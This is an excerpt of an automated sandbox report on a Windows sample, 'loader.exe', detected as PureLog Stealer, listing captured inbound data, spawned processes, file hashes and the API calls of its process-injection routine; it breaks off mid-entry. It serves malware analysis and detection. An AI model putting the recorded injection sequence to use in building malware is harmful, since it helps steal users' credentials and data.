70 72 36 75 78 52 78 44 5a 51 56 6d 74 7a 4b 53 76 6a 59 38 30 6e Data Ascii: 3714wxmMbgIcCkBHRIxT/k2QoxJgRh+K5x87Nk3LgSGDKraYYq4Idj4wcWtm6XHEfLyBdkJ8Pc7We3pCB4OzSKge6uxP51ZQQCUJA3zvN5oI/NF3BS913oJRc3gBuMNy5RvzhVrIOmssYRAmCLs5ihrE21pYIU/yny4LZRq/tBfIZPj2Ke9ed2tMChtr2QKvdMjyXjMUJuWRamsHF5vER/pr6uxRxDZQVmtzKSvjY80n
2025-01-05 18:28:16 UTC	1369	IN	Data Raw: 77 74 6c 42 56 77 52 73 35 4e 35 4e 65 58 63 59 6f 62 64 55 38 32 7a 31 70 48 44 42 43 7a 56 33 50 79 51 4b 4a 63 73 38 75 53 2b 6b 6b 47 59 54 49 47 79 2f 73 56 42 49 59 42 2f 2b 38 78 47 77 63 73 36 32 63 4c 6c 5a 5a 6d 56 47 45 6a 51 64 32 48 69 5a 44 36 6a 2f 50 53 6b 53 57 4c 36 64 4b 51 4a 6b 4f 4b 4c 33 57 4c 4e 59 39 62 5a 58 77 6c 74 70 55 6d 45 31 4d 42 50 47 5a 4b 38 63 78 4e 42 4f 54 77 31 52 78 62 55 6d 56 45 41 34 6d 37 42 37 30 32 2f 6b 75 6c 6a 51 51 57 35 59 61 52 49 64 4c 62 38 39 6a 69 4b 67 6b 48 67 79 63 30 79 39 70 6b 70 56 44 78 2b 4a 78 52 48 6e 61 38 4b 4a 55 65 45 48 4b 53 68 57 62 78 45 76 74 41 47 69 59 74 6e 6e 4b 6a 6b 69 65 39 2b 4c 62 56 35 54 4a 49 2f 56 52 4d 35 45 2b 49 39 71 7a 6a 31 6b 4c 55 38 46 44 52 4b 38 45 4d 34 Data Ascii: wtlBVwRs5N5NeXcYobdU82z1pHDBCzV3PyQKJcs8uS+kkGYTIGy/sVBIYB/+8xGwcs62cLlZZmVGEjQd2HiZD6j/PSkSWL6dKQJkOKL3WLNY9bZXwltpUmE1MBPGZK8cxNBOTw1RxbUmVEA4m7B702/kuljQQW5YaRIdLb89jiKgkHgyc0y9pkpVDx+JxRHna8KJUeEHKShWbxEvtAGiYtnnKjkie9+LbV5TJI/VRM5E+I9qzj1kLU8FDRK8EM4
2025-01-05 18:28:16 UTC	1369	IN	Data Raw: 6a 4d 55 4a 75 57 52 61 6d 73 48 46 35 76 45 52 2f 70 72 36 75 78 52 78 44 5a 51 56 6d 74 7a 4b 53 76 6a 59 38 30 6e 77 74 6c 42 56 77 64 4b 35 4e 35 4e 65 58 4a 38 72 38 42 56 79 57 4b 45 71 6a 4b 34 4d 69 31 4b 59 58 67 56 47 4b 4d 61 75 6e 58 7a 78 33 59 6c 4b 6d 33 76 67 6e 5a 52 59 69 69 46 79 57 2f 50 57 66 53 51 66 37 30 72 52 30 78 63 63 41 52 30 35 7a 57 66 41 61 66 4a 4b 7a 63 53 5a 38 4c 66 65 47 74 4f 4e 66 71 78 63 74 52 65 67 2f 56 53 77 69 41 32 4c 47 6c 77 4d 6a 50 4b 47 61 4a 69 78 66 4a 44 57 52 35 4f 78 72 52 4e 41 6c 6b 37 76 74 45 51 32 58 72 7a 70 57 44 4e 4d 69 31 55 51 68 67 56 44 75 31 67 6b 43 4c 2f 6b 79 45 4b 46 47 58 5a 30 46 35 75 57 48 53 5a 77 32 57 79 54 76 65 33 55 38 52 63 61 7a 63 2b 48 47 67 53 35 32 75 73 45 62 2f 71 Data Ascii: jMUJuWRamsHF5vER/pr6uxRxDZQVmtzKSvjY80nwtlBVwdK5N5NeXJ8r8BVyWKEqjK4Mi1KYXgVGKMaunXzx3YlKm3vgnZRYiiFyW/PWfSQf70rR0xccAR05zWfAafJKzcSZ8LfeGtONfqxctReg/VSwiA2LGlwMjPKGaJixfJDWR5OxrRNAlk7vtEQ2XrzpWDNMi1UQhgVDu1gkCL/kyEKFGXZ0F5uWHSZw2WyTve3U8Rcazc+HGgS52usEb/q
2025-01-05 18:28:16 UTC	1369	IN	Data Raw: 50 46 6c 6b 56 56 42 78 65 4b 38 32 44 37 58 59 61 36 55 4b 63 2f 64 56 35 61 63 52 30 55 78 44 69 4b 50 2f 33 56 57 78 4d 43 52 65 47 64 65 77 39 5a 66 66 6a 7a 52 4d 78 6f 2b 35 74 42 79 67 59 70 63 31 49 4c 4c 68 69 6a 41 4d 67 38 30 39 45 35 45 58 5a 65 35 35 52 46 55 6b 64 36 73 66 6c 52 37 68 7a 78 6e 7a 62 57 49 55 4d 33 62 69 51 39 44 4f 41 57 73 79 54 65 78 46 6c 58 63 46 7a 4d 6b 53 63 43 5a 79 4f 64 2b 78 6a 48 62 75 4f 5a 62 4c 67 71 5a 43 38 68 4e 78 51 4a 76 52 57 77 43 76 58 79 58 56 45 78 61 65 43 72 54 57 74 78 4e 4b 48 6b 57 38 59 63 2f 72 70 4f 37 7a 31 47 63 30 49 6f 4d 52 4c 31 4a 4d 6b 71 33 65 31 6b 41 33 4e 36 35 70 39 4a 61 31 34 45 6e 4c 4e 6f 38 46 76 37 74 31 33 63 4f 45 4e 61 4f 42 4d 74 44 37 6b 79 69 7a 58 64 2b 6e 59 79 44 Data Ascii: PFlkVVBxeK82D7XYa6UKc/dV5acR0UxDiKP/3VWxMCReGdew9ZffjzRMxo+5tBygYpc1ILLhijAMg809E5EXZe55RFUkd6sflR7hzxnzbWIUM3biQ9DOAWsyTexFlXcFzMkScCZyOd+xjHbuOZbLgqZC8hNxQJvRWwCvXyXVExaeCrTWtxNKHkW8Yc/rpO7z1Gc0IoMRL1JMkq3e1kA3N65p9Ja14EnLNo8Fv7t13cOENaOBMtD7kyizXd+nYyD
2025-01-05 18:28:16 UTC	1369	IN	Data Raw: 50 45 46 63 34 6d 64 55 5a 37 32 2f 58 6d 53 48 6e 44 30 52 2f 57 33 59 4b 48 62 34 6d 69 51 2f 61 34 45 41 4a 46 31 76 74 68 48 74 79 59 77 79 62 74 48 62 32 52 59 62 31 66 4e 6b 35 52 53 39 43 43 41 38 4e 35 54 6d 6f 49 2f 66 6c 66 55 73 73 57 37 79 4d 66 51 4e 36 66 2f 4c 54 59 38 4a 6c 39 49 41 70 35 44 38 77 64 45 30 79 63 52 4b 38 61 36 77 72 6f 4f 38 35 50 47 6c 54 31 73 67 6f 63 77 55 4d 72 39 4e 7a 30 42 37 43 39 79 7a 65 47 44 4e 34 5a 42 5a 7a 42 63 4a 68 6d 52 54 63 35 46 4d 74 44 31 62 79 33 32 68 42 65 53 4f 6d 36 78 61 6f 54 4d 57 62 4b 4c 6b 68 64 69 35 44 44 33 49 79 2f 7a 57 2f 65 50 66 52 57 41 35 32 54 74 6a 65 52 6e 6c 75 4e 4b 37 51 51 2f 4a 6a 77 37 4a 59 75 68 35 61 63 47 68 34 47 32 76 62 46 36 6f 48 38 5a 42 58 57 43 70 57 33 4e Data Ascii: PEFc4mdUZ72/XmSHnD0R/W3YKHb4miQ/a4EAJF1vthHtyYwybtHb2RYb1fNk5RS9CCA8N5TmoI/flfUssW7yMfQN6f/LTY8Jl9IAp5D8wdE0ycRK8a6wroO85PGlT1sgocwUMr9Nz0B7C9yzeGDN4ZBZzBcJhmRTc5FMtD1by32hBeSOm6xaoTMWbKLkhdi5DD3Iy/zW/ePfRWA52TtjeRnluNK7QQ/Jjw7JYuh5acGh4G2vbF6oH8ZBXWCpW3N
2025-01-05 18:28:16 UTC	1369	IN	Data Raw: 4f 72 72 45 47 63 64 45 32 4c 56 34 33 42 78 6a 61 58 41 50 4d 58 62 6d 59 4d 73 33 32 2b 39 6d 45 41 6c 73 73 74 5a 70 61 46 64 2b 6f 74 64 6d 33 77 58 61 72 6d 72 39 47 48 52 59 58 79 63 55 4e 39 55 58 6d 53 72 49 36 55 51 4f 43 43 62 39 72 55 4d 55 64 33 57 38 38 56 53 78 52 76 2b 46 51 2b 39 57 4e 58 5a 59 4b 67 73 6d 74 42 2f 4d 64 4d 4c 68 63 77 51 58 4a 2b 54 53 54 77 6c 30 49 6f 61 34 61 4c 52 62 35 59 4a 39 33 79 64 56 55 32 73 46 66 77 72 45 5a 38 6b 4c 33 4e 52 64 55 6a 78 50 2b 61 56 4d 58 51 63 49 6a 66 45 51 78 31 50 50 75 33 2f 56 4b 58 42 32 4f 69 6f 79 4e 50 59 6b 6a 44 7a 6e 7a 6e 6f 52 4d 58 7a 35 6c 79 6c 77 51 6a 57 6b 74 57 76 72 51 4e 75 66 4e 73 30 76 63 57 70 38 42 42 49 73 77 44 53 72 41 2f 2f 78 53 79 31 31 55 37 75 69 54 30 4a Data Ascii: OrrEGcdE2LV43BxjaXAPMXbmYMs32+9mEAlsstZpaFd+otdm3wXarmr9GHRYXycUN9UXmSrI6UQOCCb9rUMUd3W88VSxRv+FQ+9WNXZYKgsmtB/MdMLhcwQXJ+TSTwl0Ioa4aLRb5YJ93ydVU2sFfwrEZ8kL3NRdUjxP+aVMXQcIjfEQx1PPu3/VKXB2OioyNPYkjDznznoRMXz5lylwQjWktWvrQNufNs0vcWp8BBIswDSrA//xSy11U7uiT0J
2025-01-05 18:28:16 UTC	1369	IN	Data Raw: 42 48 48 58 73 61 61 64 38 51 6e 5a 6e 52 6f 64 52 49 65 77 6d 57 4c 4c 76 79 49 56 53 51 43 61 2f 32 6a 58 58 46 50 4e 59 4f 35 52 74 4e 53 7a 72 42 36 36 42 30 70 61 58 73 33 43 48 62 67 4f 70 30 75 2b 4a 46 55 46 69 70 4e 34 64 52 75 44 6b 38 56 68 37 4a 4b 7a 42 6e 33 6a 6c 7a 69 49 6b 64 36 63 77 45 62 61 38 51 55 68 6a 57 69 69 46 64 57 4e 6c 36 39 68 6b 64 4c 54 6a 53 44 32 48 61 6f 66 50 47 4b 66 50 34 44 63 6d 70 41 42 48 55 74 75 44 53 4a 48 76 50 51 51 44 78 70 56 73 37 66 66 47 31 5a 42 76 76 72 55 38 4a 44 2f 2f 52 46 6f 79 42 4b 55 6b 59 58 50 33 62 64 4b 73 34 4b 33 63 39 58 4c 47 30 71 36 4a 35 61 62 47 63 5a 71 63 68 76 74 55 76 33 74 46 2b 34 48 6d 4e 7a 61 48 49 45 44 50 38 6e 68 77 44 6c 34 6c 52 55 50 43 6d 7a 68 6e 68 69 62 7a 53 6b Data Ascii: BHHXsaad8QnZnRodRIewmWLLvyIVSQCa/2jXXFPNYO5RtNSzrB66B0paXs3CHbgOp0u+JFUFipN4dRuDk8Vh7JKzBn3jlziIkd6cwEba8QUhjWiiFdWNl69hkdLTjSD2HaofPGKfP4DcmpABHUtuDSJHvPQQDxpVs7ffG1ZBvvrU8JD//RFoyBKUkYXP3bdKs4K3c9XLG0q6J5abGcZqchvtUv3tF+4HmNzaHIEDP8nhwDl4lRUPCmzhnhibzSk
2025-01-05 18:28:16 UTC	1369	IN	Data Raw: 76 66 38 53 6e 4a 41 33 45 74 54 43 45 57 41 75 59 36 6c 77 54 48 7a 57 59 7a 46 47 6e 74 74 44 52 33 48 51 57 74 7a 30 6e 58 62 66 2f 79 65 4d 34 73 5a 48 56 50 4b 44 59 41 31 67 75 77 4e 50 47 57 59 79 6b 32 55 66 44 52 65 41 6c 31 42 71 48 73 57 4d 56 5a 33 71 51 70 37 31 35 78 4a 55 38 4b 44 7a 44 6e 41 72 6f 66 75 35 52 42 4d 6e 39 34 76 6f 6c 53 64 58 6f 4d 6a 74 46 59 77 6b 6e 67 38 45 50 50 50 44 46 6d 66 7a 41 6d 63 62 67 35 69 58 58 70 35 6e 6b 78 4c 56 6e 72 6b 6c 73 4b 55 67 79 6c 31 30 57 79 54 74 44 33 62 72 30 6c 63 55 35 57 62 77 34 41 77 69 4b 53 48 71 6e 4c 59 54 63 75 58 74 62 49 4b 6d 4e 71 59 70 65 75 59 75 78 37 2f 50 4a 52 78 56 74 70 4e 32 51 70 4a 52 65 31 5a 72 6f 35 35 2b 64 51 4b 6a 39 6e 77 74 39 34 61 30 34 31 2b 63 64 31 30 Data Ascii: vf8SnJA3EtTCEWAuY6lwTHzWYzFGnttDR3HQWtz0nXbf/yeM4sZHVPKDYA1guwNPGWYyk2UfDReAl1BqHsWMVZ3qQp715xJU8KDzDnArofu5RBMn94volSdXoMjtFYwkng8EPPPDFmfzAmcbg5iXXp5nkxLVnrklsKUgyl10WyTtD3br0lcU5Wbw4AwiKSHqnLYTcuXtbIKmNqYpeuYux7/PJRxVtpN2QpJRe1Zro55+dQKj9nwt94a041+cd10
2025-01-05 18:28:16 UTC	1369	IN	Data Raw: 79 79 68 52 4b 55 45 67 30 4b 57 2f 30 45 61 52 38 38 2b 46 6d 4b 79 67 74 75 70 49 71 43 32 41 71 75 4e 4e 4b 32 6d 6d 46 6f 45 50 65 4b 33 4a 51 62 44 49 75 49 37 38 32 72 78 58 64 79 47 45 6e 41 58 6e 74 31 31 6c 5a 59 44 53 2b 73 52 48 54 53 34 2f 30 63 74 6f 35 53 45 35 4e 47 43 41 55 39 43 75 4c 66 63 54 4b 5a 6a 78 70 4c 63 47 6c 65 77 35 77 4c 72 47 7a 56 73 6b 66 36 75 78 78 33 54 70 59 52 45 51 4d 46 43 32 31 4a 6f 77 34 79 4d 39 4c 50 47 6c 61 30 35 5a 65 55 33 34 4b 76 4e 4e 78 31 42 6d 42 6d 6d 6e 59 58 57 56 53 63 41 6b 4c 42 65 51 39 79 52 76 53 78 6e 34 44 63 47 76 61 67 53 30 50 65 58 6d 43 31 30 6a 47 65 4e 2b 61 58 63 55 4e 5a 33 68 50 64 48 41 69 2f 7a 71 53 50 2f 58 32 57 69 31 77 62 4d 6d 47 65 55 6c 7a 43 2b 44 58 57 4c 55 61 67 71 Data Ascii: yyhRKUEg0KW/0EaR88+FmKygtupIqC2AquNNK2mmFoEPeK3JQbDIuI782rxXdyGEnAXnt11lZYDS+sRHTS4/0cto5SE5NGCAU9CuLfcTKZjxpLcGlew5wLrGzVskf6uxx3TpYREQMFC21Jow4yM9LPGla05ZeU34KvNNx1BmBmmnYXWVScAkLBeQ9yRvSxn4DcGvagS0PeXmC10jGeN+aXcUNZ3hPdHAi/zqSP/X2Wi1wbMmGeUlzC+DXWLUagq

Target ID:	0
Start time:	13:28:03
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\loader.exe"
Imagebase:	0x550000
File size:	8'750'080 bytes
MD5 hash:	756CC98F850799FC6783BD07E91CAB52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1818004819.0000000003A19000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1694866108.0000000000552000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:28:03
Start date:	05/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:28:03
Start date:	05/01/2025
Path:	C:\Users\user\Desktop\loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\loader.exe"
Imagebase:	0xec0000
File size:	8'750'080 bytes
MD5 hash:	756CC98F850799FC6783BD07E91CAB52
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:28:03
Start date:	05/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7320 -s 940
Imagebase:	0x7c0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	9.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	44.4%
Total number of Nodes:	18
Total number of Limit Nodes:	2

Executed Functions

Function 02A18621 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A18593,02A18583), ref: 02A187B9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A187CC
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 02A187EA
ReadProcessMemory.KERNELBASE(0000038C,?,02A185D7,00000004,00000000), ref: 02A1880E
VirtualAllocEx.KERNELBASE(0000038C,?,?,00003000,00000040), ref: 02A18839
WriteProcessMemory.KERNELBASE(0000038C,00000000,?,?,00000000,?), ref: 02A18891
WriteProcessMemory.KERNELBASE(0000038C,00400000,?,?,00000000,?,00000028), ref: 02A188DC
WriteProcessMemory.KERNELBASE(0000038C,?,?,00000004,00000000), ref: 02A1891A
Wow64SetThreadContext.KERNEL32(0000009C,02850000), ref: 02A18956
ResumeThread.KERNELBASE(0000009C), ref: 02A18965

Strings

GetP, xrefs: 02A186A3
TerminateProcess, xrefs: 02A18848
WriteProcessMemory, xrefs: 02A18734
ResumeThread, xrefs: 02A1875D
GetThreadContext, xrefs: 02A186FB
VirtualAlloc, xrefs: 02A186E8
VirtualAllocEx, xrefs: 02A18721
Load, xrefs: 02A1865F
SetThreadContext, xrefs: 02A18747
ReadProcessMemory, xrefs: 02A1870E
aryA, xrefs: 02A18667
CreateProcessW, xrefs: 02A186D5
ress, xrefs: 02A186AB

Memory Dump Source

Source File: 00000000.00000002.1817979919.0000000002A18000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a18000_loader.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: 3ef6113e409b2b5db1539c8a6b998978b00ace9a0189da2fbb5007ebfe3ae459
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: 5FB1087660024AAFDB60CF68CC80BDA73A5FF88724F158524EA1CAB341D774FA51CB94

Function 02A1879E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02A18593,02A18583), ref: 02A187B9
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02A187CC
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 02A187EA
ReadProcessMemory.KERNELBASE(0000038C,?,02A185D7,00000004,00000000), ref: 02A1880E
VirtualAllocEx.KERNELBASE(0000038C,?,?,00003000,00000040), ref: 02A18839
WriteProcessMemory.KERNELBASE(0000038C,00000000,?,?,00000000,?), ref: 02A18891
WriteProcessMemory.KERNELBASE(0000038C,00400000,?,?,00000000,?,00000028), ref: 02A188DC
WriteProcessMemory.KERNELBASE(0000038C,?,?,00000004,00000000), ref: 02A1891A
Wow64SetThreadContext.KERNEL32(0000009C,02850000), ref: 02A18956
ResumeThread.KERNELBASE(0000009C), ref: 02A18965

Strings

TerminateProcess, xrefs: 02A18848

Memory Dump Source

Source File: 00000000.00000002.1817979919.0000000002A18000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A18000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2a18000_loader.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: TerminateProcess
API String ID: 2687962208-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 9acfcbae4f1102d06ae69a3aa68de253c13f6b7386f14140230d8f6d1255aff7
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: 40311C72640646AFE734CF54CC91FEA73B5BFC8B15F148508EB09AF280C6B4BA018B94

Function 00BE2E2F Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03A13588,00000000,?,?,?,?,?,?,?,0055A227,00000000,?,00BE1116,?,00000040), ref: 00BE2EC1

Memory Dump Source

Source File: 00000000.00000002.1817607439.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_loader.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 37030accbdd8f3d4d2d4d9f654a4a3308267140ab8acc505beb0abcf637680a7
Instruction ID: 67465cf0ffb386a9473c9f417dda04ea0a13ad0a1bda51c7c8a69cfd9c1b7eb9
Opcode Fuzzy Hash: 37030accbdd8f3d4d2d4d9f654a4a3308267140ab8acc505beb0abcf637680a7
Instruction Fuzzy Hash: FE2114B18053999FCB01CFA9D884ADEFFB4FF09310F05819AE558A7252C3786954CFA1

Function 00BE06E8 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03A13588,00000000,?,?,?,?,?,?,?,0055A227,00000000,?,00BE1116,?,00000040), ref: 00BE2EC1

Memory Dump Source

Source File: 00000000.00000002.1817607439.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_loader.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1201f57c7a911f6c8eb1fe819ee7684fecc5e83dec905e1bbd4ef19c4ac78925
Instruction ID: be2229fc9831ecfd0b56a0e0a2fc9d1cb2c5c5e9289eb87fae82e8a4a9a4226f
Opcode Fuzzy Hash: 1201f57c7a911f6c8eb1fe819ee7684fecc5e83dec905e1bbd4ef19c4ac78925
Instruction Fuzzy Hash: 8821B2B5901259AFCB00DF9AD885ADEFBF8FB48310F10816AE918A7250C7746954CBA5

Non-executed Functions

Function 00BE0861 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00BE0939
4'^q, xrefs: 00BE090E

Memory Dump Source

Source File: 00000000.00000002.1817607439.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_loader.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: db785d1148d14bf2abfb1235b0a62cdb10fa56f6ba38f1908086ffdc04ebab8c
Instruction ID: c7dc5af8bb8ba7ef0883458e87c47a5440dc5c69173901e4ef4a05ee2e2fad3f
Opcode Fuzzy Hash: db785d1148d14bf2abfb1235b0a62cdb10fa56f6ba38f1908086ffdc04ebab8c
Instruction Fuzzy Hash: 6D512E74A002448FDB09EF7AE951A99BBE3FFD4B14B14C56AD0099B26DEF305907CB50

Function 00BE0870 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

4'^q, xrefs: 00BE0939
4'^q, xrefs: 00BE090E

Memory Dump Source

Source File: 00000000.00000002.1817607439.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_be0000_loader.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q
API String ID: 0-2697143702
Opcode ID: 0e3ec88c0e37f83b21c71dcf7b575d49b3ff60d9d058f33b344edb32269d06c4
Instruction ID: 295fbdd864888b8b99dafbac54da382b58a2161afaba98d77c725a129d95e53c
Opcode Fuzzy Hash: 0e3ec88c0e37f83b21c71dcf7b575d49b3ff60d9d058f33b344edb32269d06c4
Instruction Fuzzy Hash: 2B510E74A002048FDB09EF7AE951A9ABBE3EBD4B14F05C56AD0089B27DEF345907CB50

Analysis Process: loader.exePID: 7388, Parent PID: 7320COMMON

Execution Graph

Execution Coverage:	8.9%
Dynamic/Decrypted Code Coverage:	6.4%
Signature Coverage:	30.9%
Total number of Nodes:	249
Total number of Limit Nodes:	16

Executed Functions

Function 004126F0 Relevance: 119.3, APIs: 3, Strings: 64, Instructions: 2032COMMON

Download Yara Rule

Strings

l, xrefs: 00413E18
3, xrefs: 00414265
<, xrefs: 004128ED
%, xrefs: 004141F5
;, xrefs: 00414225
I, xrefs: 004142CD
`, xrefs: 00413839
%, xrefs: 004142ED
(, xrefs: 00413176
D, xrefs: 00412E6F
-, xrefs: 00413004
t, xrefs: 0041316E
=, xrefs: 00414235
5, xrefs: 00414275
!, xrefs: 00413196
), xrefs: 00413F58
6, xrefs: 00413FD8
2, xrefs: 004131A6
1, xrefs: 00414255
Q, xrefs: 00412751
(, xrefs: 0041361C
-, xrefs: 004141B5
b, xrefs: 0041300C
-, xrefs: 0041428D
9, xrefs: 00414215
', xrefs: 00414205
), xrefs: 0041429D
J, xrefs: 004131BE
9, xrefs: 00413778
,, xrefs: 00412FFC
@, xrefs: 00412A4B
S, xrefs: 00413BCA
-, xrefs: 00413FB8
8, xrefs: 00413782
!, xrefs: 004141D5
#, xrefs: 004141E5
N, xrefs: 0041319E
5, xrefs: 004142FD
2, xrefs: 004142DD
s, xrefs: 00412A50
,, xrefs: 004142BD
+, xrefs: 0041430D
K, xrefs: 004131C6
v, xrefs: 0041315E
L, xrefs: 004131AE
G, xrefs: 0041362C
r, xrefs: 0041317E
K, xrefs: 0041360C
0, xrefs: 00413FE8
K, xrefs: 00413B9A
C, xrefs: 00413BBA
7, xrefs: 00414285
/, xrefs: 004141C5
H, xrefs: 004131CE
D, xrefs: 00414639
f, xrefs: 00412D25
I, xrefs: 00413BDA
&, xrefs: 00413186
D, xrefs: 00414408
N, xrefs: 00413BAA
?, xrefs: 00414245
p, xrefs: 0041318E
&, xrefs: 00413FA8
O, xrefs: 00413BEA

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID:
String ID: !$!$#$%$%$&$&$'$($($)$)$+$,$,$-$-$-$-$/$0$1$2$2$3$5$5$6$7$8$9$9$;$<$=$?$@$C$D$D$D$G$H$I$I$J$K$K$K$L$N$N$O$Q$S$`$b$f$l$p$r$s$t$v
API String ID: 0-1513113214
Opcode ID: 6ae2468c5b915b86d850e4325d3650a6c9a3ee13f28d84197096170bcad536e7
Instruction ID: ff993d48e03611876791427a97588a0f6d597fe8e009bba42632f25a10350256
Opcode Fuzzy Hash: 6ae2468c5b915b86d850e4325d3650a6c9a3ee13f28d84197096170bcad536e7
Instruction Fuzzy Hash: 3E13CF7150C7C08AD3349B3889483EFBBD1ABD6324F184A6EE5E9873D2D7788546874B

Function 0043CB40 Relevance: 28.9, APIs: 11, Strings: 5, Instructions: 914
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(39383F0B,00000000,00000001,?,00000000), ref: 0043CF29
SysAllocString.OLEAUT32(24F426C7), ref: 0043CFF3
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D034
SysAllocString.OLEAUT32(9A14A40C), ref: 0043D09F
SysAllocString.OLEAUT32(93579143), ref: 0043D155
VariantInit.OLEAUT32(?), ref: 0043D1CE
SysFreeString.OLEAUT32(00000000), ref: 0043D56B
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043D5A7

Strings

$Y, xrefs: 0043CD7A
:8, xrefs: 0043CF52
52, xrefs: 0043CF62
@A, xrefs: 0043D107
SPQV, xrefs: 0043D663

Memory Dump Source

Source File: 00000002.00000002.2934101183.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2934101183.0000000000456000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_loader.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: $Y$52$@A$SPQV$:8
API String ID: 505850577-640166853
Opcode ID: 25ea4b00ccdce48133bcba5ba63bc4c06e0c6b83f80ae7ef80eb2208258bdf35
Instruction ID: 463c23edf3ac0c42f4789e809e4f883a71cab79414ef7803e390024f84db47eb
